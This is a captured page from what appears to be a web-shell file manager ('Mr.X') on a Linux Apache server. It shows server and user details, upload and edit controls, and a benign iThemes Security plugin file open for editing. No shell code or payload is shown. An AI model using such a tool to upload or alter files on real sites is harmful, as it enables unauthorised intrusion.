🤩 File Manager - Mr.X
PHP:
8.2.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:container.php
<?php use iThemesSecurity\Strauss\Pimple\Container; return static function ( Container $c ) { ITSEC_Lib::extend_if_able( $c, 'dashboard.cards', static function ( $cards ) { require_once __DIR__ . '/cards/class-itsec-dashboard-card-database-backup.php'; $cards[] = new ITSEC_Dashboard_Card_Database_Backup(); return $cards; } ); };
Save Changes
Cancel
Create New File
Create New Folder